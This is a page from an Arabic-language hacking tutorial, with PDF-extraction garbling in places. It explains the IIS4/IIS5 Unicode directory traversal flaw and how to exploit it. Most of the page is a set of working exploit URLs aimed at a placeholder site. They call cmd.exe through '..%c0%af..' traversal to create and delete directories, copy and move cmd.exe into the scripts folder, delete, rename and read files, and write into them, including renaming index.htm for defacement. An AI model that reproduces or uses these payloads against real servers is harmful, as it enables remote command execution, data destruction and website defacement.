Page 129 - بسم الله الرحمن الرحيم
P. 129

‫‪ -‬تصعريف باليونيكود ‪.‬‬
   ‫اليونيكود عبارة عن مجموعة من الثغرات في مجموعة ختدمة المعلومات التي ركبت مع ‪IIS4.0 / IIS5.0‬‬

                                                                  ‫والذي ياتصي عادة مع ‪. NT4 / Win2k‬‬

                                                                    ‫‪ -‬تصاريخ ظهور هذه الثغرة ‪.‬‬
       ‫ليوجهد تصاريخ محدد لظهور اول ثغرة لليونيكود لذا يعتبر ظهورها بواسطة شخص مجهول ‪anonymous‬‬
 ‫‪ ، person‬وقيل ان اول ظهور لثغرات اليونيكود كانت بواسطة الصينين ولكن ليوجهد مايثبت صحة هذا الكل‪.‬م‬

                   ‫لهذه الثغرات ‪ ،‬فتم استغلل هذه الثغرات من قبل المخترقين وتصطوير البرامج اللزمة لها ‪.‬‬

                                                                   ‫‪ -‬كيفية ايجاد هذه الثغرات ‪.‬‬
                                                                   ‫يتم ايجاد هذه الثغرات بطريقتين ‪-:‬‬
 ‫‪ -1‬بواسطة البرامج اللزمة والمخصصة لكشف هذه الثغرات سواء بالبرامج التي تصعمل على‬
                            ‫نظا‪.‬م ويندوز او بطريقة الشل والتي تصعمل على نظا‪.‬م لينكس ‪.‬‬
                                            ‫‪ -2‬بواسطة تصطبيق الثغرة على الموقع مباشرة ‪.‬‬

                                                           ‫‪ -‬كيف يتم استغلل ثغرات اليونكود ‪.‬‬
   ‫عند تصطبيق الثغرة على نظا‪.‬م الـ ‪ IIS4 / IIS5‬يبدا ملف ‪CMD‬بفك شفرة اليونكود في المثال الخطاء‬

                                                                             ‫ومن هنا يتم استغللها ‪.‬‬

                                                     ‫‪ -‬الوامر المستخدمة بواسطة ملف ‪. CMD‬‬
    ‫الوامر المستخدمه بواسطة ملف الـ ‪ CMD‬وهي امر لنشاء دليل جهديد وامر للغاء دليل وامر النسخ‬
   ‫وامر النقل وامر الحذف وامر تصغيير اسماء الملفات وامر لرؤية محتويات الملف وامر الكتابة داختل أي‬

                                             ‫ملف وامر لسحب أي ملف ‪ ،‬وهي حسب المثلة التالية ‪-:‬‬
‫‪: http://www.xxxx.com/msadc/..%c0%af../..‬امر انشاء دليل جديد‬

‫‪%c0%af../winnt/system32/cmd.exe?/c+md+c:\hEx‬‬

‫‪: http://www.xxxx.com/msadc/..%c0%af../..‬امر الغاء دليل‬

‫‪%c0%af../winnt/system32/cmd.exe?/c+rd+c:\hEx‬‬

‫للمعلومية‪:‬لايمكن الغاء أي دليل الا اذا كان فارغ ًا تما م من الملفات والمجلدات‬

‫‪:‬الامر المستخد م للنسخ‬

‫‪http://www.xxxx.com/msadc/..%c0%af../..‬‬
‫‪%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\hEx.ex‬‬
‫‪e‬‬

‫‪:‬الامر المستخد م للنقل‬

‫‪http://www.xxxx.com/msadc/..‬‬
‫‪%c0%af../winnt/system32/cmd.exe?/c+move+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\hEx.e‬‬
‫\‪xe+c:‬‬

‫‪: http://www.xxxx.com/msadc/..%c0%af../..‬الامر المستخد م للحذف‬

‫‪%c0%af../winnt/system32/cmd.exe?/c+del+c:\hEx.mdb‬‬

‫‪: http://www.xxxx.com/msadc/..‬الامر المستخد م لتغيير مسمى الملفات‬

‫‪%c0%af../winnt/system32/cmd.exe?/c+ren+c:\index.htm+hEx.htm‬‬

‫‪: http://www.xxxx.com/msadc/..%c0%af../..‬الامر المستخد م لرؤية محتويات الملف‬

‫‪%c0%af../winnt/system32/cmd.exe?/c+type+c:\hEx.txt‬‬

‫‪:‬الامر المستخد م للكتابة داخل أي ملف‬

‫‪http://www.xxxx.com/msadc/..‬‬
‫‪%c0%af../winnt/system32/cmd.exe?/c+echo+sNiper_hEx+>c:\hEx.txt‬‬

‫‪:‬الامر المستخد م لعملية سحب أي ملف‬

                                                  ‫‪129‬‬
   124   125   126   127   128   129   130   131   132   133   134